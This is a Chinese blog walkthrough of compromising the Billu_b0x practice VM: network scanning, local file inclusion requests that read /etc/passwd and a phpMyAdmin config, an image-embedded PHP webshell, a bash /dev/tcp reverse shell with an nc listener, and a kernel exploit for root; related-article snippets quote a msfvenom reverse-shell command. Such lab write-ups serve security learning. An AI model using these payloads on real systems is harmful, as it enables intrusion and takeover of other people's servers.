一次Billu_b0x滲透學習

原創 nini_boom 2019-10-26 01:07

一次Billu_b0x滲透學習

這次的Billu_b0x靶場應該說是學習經驗,按照大神的流程走了一遍,中間各種掃盲,和學習思路,現在把整體的思路和過程梳理一下。

一、發現IP

虛擬機打開,按照規則所說,NAT模式,沒有發現IP
在這裏插入圖片描述
於是ifconfig,找到vmnet8的C段,這裏就是虛擬機存在的網段。
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-dMlQzeIh-1571210696741)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104516252.png)]
nmap -sP 172.16.230.1/24
nmap -sP 是掃描這個C段對ping進行迴應的主機,/24 = 255.255.255.0,子網掩碼

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-UaGL4DUK-1571210696742)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104543526.png)]找到ip爲172.16.230.151

二、信息收集

nmap -sV -sC -A -Pn -oN 172.16.230.151.txt 172.16.230.151
[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-imrnb0gg-1571210696746)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104622197.png)]
ssh和80web端口是開着的。

打開網頁目錄掃描

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-aVpGBwSR-1571210696750)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016104719204.png)]

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-TMurTIer-1571210696754)(/Users/liyang/Library/Application Support/typora-user-images/image-20191012113756970.png)]

  • in.php
  • show.php
  • add.php
  • index.php
  • phpmy(字典沒掃出來,字典強大還是很重要哇)
in.php show.php add.php index.php c.php phpmy
phpinfo界面 登錄界面 文件上傳界面 同登錄界面 無界面 phpMyAdmin

三、初探

  • phpmy是phpMyAdmin界面。

  • 主頁提示show me your SQLI skills,sqlfuzz字典+burp了一波,發現注入不了,要是有不同的錯誤回顯還好些,SQL注入我是放棄了。

  • add.php有文件上傳,但是抓包發現沒有回顯文件地址,故也沒走通。

  • test.php發現有提示
    在這裏插入圖片描述

file暗指文件包含?

GET 方式傳參file

GET /test.php?file=/etc/passwd HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

無反應

POST 方式傳參file

burp直接 change Method

POST /test.php HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

file=/etc/passwd

返回

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-4kBa52sO-1571210696764)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016110057094.png)]

這裏可以看到,root和ica用戶擁有shell權限。

我們感興趣的頁面源碼是不是都可以拿下來?

  • c.php
<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>
  • index.php
<?php
session_start();

include('c.php');
include('head.php');
if(@$_SESSION['logged']!=true)
{
	$_SESSION['logged']='';
	
}

if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
{
	
	echo "you are logged in :)";
	header('Location: panel.php', true, 302);
}
else
{
echo '<div align=center style="margin:30px 0px 0px 0px;">
<font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> 
<br><br>
Show me your SQLI skills <br>
<form method=post>
Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
<input type=submit name=login value="let\'s login">';
}
if(isset($_POST['login']))
{
	$uname=str_replace('\'','',urldecode($_POST['un']));
	$pass=str_replace('\'','',urldecode($_POST['ps']));
	$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
	$result = mysqli_query($conn, $run);
if (mysqli_num_rows($result) > 0) {

$row = mysqli_fetch_assoc($result);
	   echo "You are allowed<br>";
	   $_SESSION['logged']=true;
	   $_SESSION['admin']=$row['username'];
	   
	 header('Location: panel.php', true, 302);
   
}
else
{
	echo "<script>alert('Try again');</script>";
}
	
}
echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";

?>
  • add.php
<?php


echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
	<input type=text name=name value="name">
	<input type=text name=address value="address">
	<input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';



?>

好了,就不一一列出來了。

四、兩種方式拿到root

一、phpmyadmin配置文件

前面已經有任意文件下載的問題,phpmyadmin默認配置文件config.inc.php

猜測目錄可能在/var/www/phpmy/config.inc.php

POST /test.php HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

file=/var/www/phpmy/config.inc.php

結果

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-gze4gHGY-1571210696766)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111535054.png)]

使用rootroottoor進行ssh登陸

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-zmTtVCjg-1571210696770)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111637024.png)]

實驗結束。

二、常規滲透

1、登入後臺

注意到c.php,有mysql的連接祕鑰billub0x_billu嘗試登陸phpmy後臺

看到了這個網站的數據庫結構,使用auth下的賬號登陸index.php

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-iP5ftrLr-1571210696771)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111750558.png)]

成功登錄界面

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-GMMYdzWt-1571210696773)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016111832680.png)]

這裏AddUser功能有上傳文件,當然是做了限制的,但是我們有源碼可以進行審計。

2、代碼審計

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-3kIXvWgH-1571210696778)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016112100176.png)]

好的,沒有對傳入的參數進行過濾,存在任意文件包含。

3、圖片馬+本地文件包含拿到cmdshell

可以想到圖片馬+任意文件包含拿到cmdShell

我們看看continue哪些參數我們可控。

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-T2Urry1q-1571210696780)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016112259448.png)]

load直接作爲參數$choice在include中被包含,那我直接將load改爲圖片馬的路徑,不就可以解析圖片馬了麼。

OK,我們上傳正常的圖片上去,在圖片數據流最後,加入

<?php system($_GET['cmd']);?>

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-Zon2XJfN-1571210696786)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016112830210.png)]

這是我們上傳的圖片地址/uploaded_images/j.jpg。

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-q0Dbjfgi-1571210696789)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016113046379.png)]

點擊continue轉包,將GET後的參數改爲cmd=cat%20/etc/passwd;ls爲圖片馬提供參數,將post中的body改爲load=/uploaded_images/j.jpg&continue=continue包含我們的圖片馬目錄

POST /panel.php?cmd=cat%20/etc/passwd;ls HTTP/1.1
Host: 172.16.230.151
User-Agent: Mozilla/5.0(Linux;U;Android2.3.6;zh-cn;GT-S5660Build/GINGERBREAD)AppleWebKit/533.1(KHTML,likeGecko)Version/4.0MobileSafari/533.1MicroMessenger/4.5.255
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Connection: close
Referer: http://172.16.230.151/panel.php
Cookie: PHPSESSID=b25l18nkjd4i9g1lug3tm15435
Upgrade-Insecure-Requests: 1

load=/uploaded_images/j.jpg&continue=continue

返回,圖片馬被觸發成功。

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-nxafxSyi-1571210696790)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016113327508.png)]

4、反彈shell

echo "bash -i >& /dev/tcp/192.168.31.237/4444 0>&1" | bash

命令解釋:

bash -i : bash是Linux下一個常見的shell,-i參數表示產生一個交互式的shell

/dev/tcp/192.168.175.134/8080 : /dev/tcp|udp/ip/port是一個Linux中比較特殊的一個文件,如果在Linux上訪問就會發現這個文件並不存在,其含義是讓主機與目標主機ip在端口port建立一個tcp或udp連接

0>&1:將標準輸入0輸出重定向至標準輸出1。或者可以這麼理解,將標準輸入0和標準輸出1合併,在重定向至1,因爲前面已經將標準輸出1重定向至/dev/tcp/192.168.175.134/8080,所以現在標準輸入0和標準輸出1都指向/dev/tcp/192.168.175.134/8080

至於echo 和 | bash是代表什麼意思,我就不太清楚了,有知道的表哥可以告知下!

echo "bash -i >& /dev/tcp/172.16.1.75/4444 0>&1" | bash進行URL編碼,作爲cmd參數傳入

本地nc -lvp 4444監聽反彈來的shell。

uploaded_images目錄我們擁有讀寫執行權限的目錄

5、提權

uname -a找到對應liunx版本

https://www.exploit-db.com/exploits/37292/

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-svnjWX7X-1571210696803)(/Users/liyang/Library/Application Support/typora-user-images/image-20191016150613653.png)]

拿到root

五、總結

信息收集很重要!所有的信息都要留意,切不能悶頭無腦擼站。如果沒有test.php的提示,就很難有突破點

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

WEB安全——文件上傳

通過burpsuite抓包上傳webshell 先上傳正常圖片; 通過抓包獲得上傳頁面的url以及cookie; 通過明小子的綜合上傳功能上傳webshell;   IIS解析漏洞: 1.如果一個目錄以“xxx.asp”的形式命名,那麼該

gam0n 2020-07-08 11:53:40

白帽子學習筆記——瀏覽器安全

同源策略: 影響源的因素有host(域名或IP地址,如果是IP地址則看作一個根域名)、子域名、端口、協議; 在瀏覽器中,<script>,<img>,<iframe>,<link>等標籤都是可以跨域加載資源,不受同源策略影響, 這些帶"s

gam0n 2020-07-08 11:53:40

[GXYCTF2019]BabySQli

看了大佬的博客,勉強整出來了,詳細的寫一下我的思路。 錯誤思路: 觀察發現是post傳值,想用sqlmap一把嗦,BP抓包=>sqlmap 得到數據庫:web_sqli 表:user 字段:passwd 得到密碼是cdc9c81

imbia 2020-07-08 02:36:55

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

CVE-2020-1938(RCE利用)

CVE-2020-1938(RCE利用) 1.使用msf生成反彈shell馬,並且監聽 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R >

陈玄都 2020-07-07 19:56:42

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938)

Apache Tomcat任意文件讀取漏洞POC測試(CVE-2020-1938) 1.背景 Tomcat是由Apache軟件基金會屬下Jakarta項目開發的Servlet容器,按照Sun Microsystems提供的技術規範,實現了

陈玄都 2020-07-07 19:56:42

Apache Solr 遠程命令執行漏洞(CVE-2019-0193)

Apache Solr 遠程命令執行漏洞(CVE-2019-0193) 聲明:本篇文章僅限用於學習信息安全技術,請勿用於非法途徑! 1.漏洞描述 2019年8月1日,Apache Solr官方發佈了CVE-2019-0193漏洞預警,漏洞

陈玄都 2020-07-07 19:56:31

隱藏在圖片裏的後門

一、前言 本文原創作者:sucppVK,本文屬i春秋原創獎勵計劃,未經許可禁止轉載! 先說明三點:   這個後門就是一句話木馬這個不同於我們常說的圖片馬這個後門是過安全狗的 這個不算什麼新姿勢,只不過被提到的次數比較少 (各大論壇常見的

i春秋论坛 2020-07-07 05:14:23

PHP 限制訪問ip白名單

摘要: web系統經常會做到只允許內部服務器交互的情況,比如我的swoole機器與web機器交互.爲了安全,也爲了方便,我沒有做加密傳輸,而是簡單的做了ip白名單限制   一  上代碼   config.php //ip白名單配

布叔喂丶 2020-07-06 11:17:09

web安全之跨站腳本攻擊XSS與防範方法

跨站腳本攻擊(Cross Site Script爲了區別於CSS簡稱爲XSS)指的是惡意攻擊者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意用戶的特殊目的。 一個簡單的留

Mark_Melon 2020-07-06 10:29:04

WEB程序防SQL注入攻擊程序

場景: WEB程序容易被SQL注入攻擊,攻擊原理是在請求參數中傳入非法字符,造成SQL語句出現出現異常情況,已達到攻擊者想要的結果。 分析: 一般的攻擊者都是在傳入的請求參數上做文章,所以我們重點檢查的是request的參數,判斷requ

成都好男人 2020-07-06 07:55:56

ApacheShiro1.2.4反序列化漏洞復現(CVE-2016-4437)

前言: Apache Shiro是一款開源安全框架,提供身份驗證、授權、密碼學和會話管理。Shiro框架直觀、易用,同時也能提供健壯的安全性。 影響版本: Apache Shiro <= 1.2.4 漏洞原理: Apache Sh

cj_hydra 2020-07-05 14:17:12

使用Ngrok來進行內網端口轉發

前言: 在學習了網絡安全之後,我們知道了公網和私網(內網),私網是不能直接在公網傳輸和通信的。比如一個學校,一個公司,都是單獨在自己的私網裏面,通過這個私網內部的路由器(NAPT方式)和外界通信。那麼如果A公司的員工要和B公司的員

cj_hydra 2020-07-05 14:17:12

phpMyAdmin(LOAD DATA INFILE) 任意文件讀取漏洞

phpMyAdmin開啓遠程登陸導致本地文件讀取 下面我們先去分析復現下這個漏洞。 $cfg['AllowArbitraryServer'] = true; //false改爲true 則登錄時就可以訪問遠程的服務器。當登陸一個

cj_hydra 2020-07-05 14:17:12

reGeorg+Proxifier實現http代理(windows下)

利用方式: 工具: reGeory 下載地址:https://github.com/sensepost/reGeorg Proxifier 下載地址:https://www.proxifier.com 第一步:將tunnel.no

cj_hydra 2020-07-05 14:17:12